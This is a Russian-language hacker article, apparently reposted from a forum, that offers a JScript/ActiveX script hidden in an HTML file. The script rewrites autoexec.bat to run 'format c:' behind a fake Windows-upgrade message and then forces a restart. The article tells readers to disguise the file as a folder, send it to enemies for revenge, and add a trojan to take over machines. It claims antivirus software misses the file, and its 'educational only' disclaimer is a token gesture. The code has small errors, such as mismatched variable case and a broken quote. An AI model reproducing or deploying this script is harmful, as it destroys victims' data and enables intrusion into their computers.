"Отформатировать винт прямо через Интернет?! ЕСТЬ СПОСОБ!
Помните! Эта статья дана ТОЛЬКО в ознакомительных учебных целях! Применять на практике ее нельзя, ибо это преследуется по закону! Я предупредил и снимаю с себя всякую ответственность за ваши действия после прочтения этой статьи!
ЗдАровА!
Ты хотел отомстить обидчику?
У тебя много врагов в сети?
Твой «друг» потенциальный ламероза и юзает Win9X?
ЭТО НАШ КЛИЕНТ!
Как известно: западло - лучше средство от печали. Этим мы и займемся. Максимальные проблемы можно создать, только отформатировав его винт! Правда красиво?! Удалить что-то - это неинтересно. Мочить так мочить!
Сейчас мы будем чистить чужой винт.
Статья про это.
Эту операцию буду делать через любимую жабу. А точнее через ЖАБОскрипт ака javascript. В него мы будем добавлять «нужные строки» и писать ЭТО в autoexec.bat.
Огромный плюс этой технологии в том, что она использует бажный ослик + известную дыру ВСЕХ осей Win (в том числе и на NT-шном ядре, на XP с сервис паками 0 и 1 работает, а вот второй сервис-пак дырочку затыкает, но затыкает ТОЛЬКО официальный!) и самое главное: Антивирь Касперского (на нем проверял, остальные не знаю…) это творение НЕ ВИДИТ!
Разжевывать ничего не буду…
Итак приступим.
Создаешь файл test.txt
В него суй текст ниже (код сплоита).
<html>
<head>
<script>
var FSO = new ActiveXObject("Scripting.FileSystemObject");
//если нужный файл есть
if (FSO.FileExists("c:\\autoexec.bat"))
{
var F = FSO.GetFile("c:\\autoexec.bat");
//ставим атрибы файлу
F.attributes=0;
//выносим его
F.Delete();
//делаем новый взамен убитого
var MyFile = fso.CreateTextFile("c:\\autoexec.bat", true);
//открываем для записи
var f = FSO.OpenTextFile("c:\\autoexec.bat", 2, true);
//пишем в него
f.WriteLine("@cls");
f.WriteLine("@echo Windows upgrading your system...");
f.WriteLine("@echo Do not abort this process!");
f.WriteLine("@format c: /q /autotest");
//закрываем и сохраняем
f.Close();
//создаем объект WshShell:
var WshShell = new ActiveXObject("WScript.Shell");
//рестарт..
WshShell.Run ("%windir%\\system\\restart.exe");
}
//обманываем антивирус
document.write(“);
//если не существует...
else
//создаем файл
var MyFile = fso.CreateTextFile("c:\\autoexec.bat", true);
//открываем и пишем
var f = FSO.OpenTextFile("c:\\autoexec.bat", 2, true);
f.WriteLine("@cls");
f.WriteLine("@echo Windows upgrading your system...");
f.WriteLine("@echo Do not abort this process!");
f.WriteLine("@format c: /q /autotest");
//закрываем
f.Close();
//создаем объект WshShell:
var WshShell = new ActiveXObject("WScript.Shell");
//рестарт..
WshShell.Run ("%windir%\\system\\restart.exe");
</script>
</head>
</html>
Сохраните этот файл. Теперь переобзовите его в test.folder и ВАУ! У вас получилась папка. Ничем неприметная папка. Можно ее зипануть и отправить мылом. Можно на сайте выложить. Можно «впарить» другими способами. Сам подумай как. Даже опытный сисадмин не заметит ничего странного, ибо папки открывать никогда никому не страшно… НО НЕ НАШУ!!!
Доделать этот скрипт не составит труда. Пошевелите мозгами и засуньте в него троянчика.
Помните, что этот баг с ActiveX компонентами очень серьезный в виндах. Даже полное отключение ActiveX компонентов и установка всех заплаток не сможет решить проблему обмана, только установка ОФИЦИАЛЬНОГО сервис пака. Для ХР это SP2. Это я пишу к тому, что правильно переписав этот код и вживив в код страницы коня например, можно получить контроль над целевой машиной. И все это под WinXP.
Я к тому, что в нете в основном используются две системы Win98 (как правило SE) и WinXP (как правило без сервисов или с предустановленным SP1). Так что открывается широкое поле для деятельности.
Юзай, да не зазнавайся, скрипт кидди!
Вечно твой BIVIS.
Помните! Эта статья дана ТОЛЬКО в ознакомительных учебных целях! Применять на практике ее нельзя, ибо это преследуется по закону! Я предупредил и снимаю с себя всякую ответственность за ваши действия после прочтения этой статьи!"
Для WIN2000 не подошла (пробовал на работе- комп видит не папку а файл с расширением .folder) а под XP негде (не у себя же дома пробовать).
Пишите отзывы.
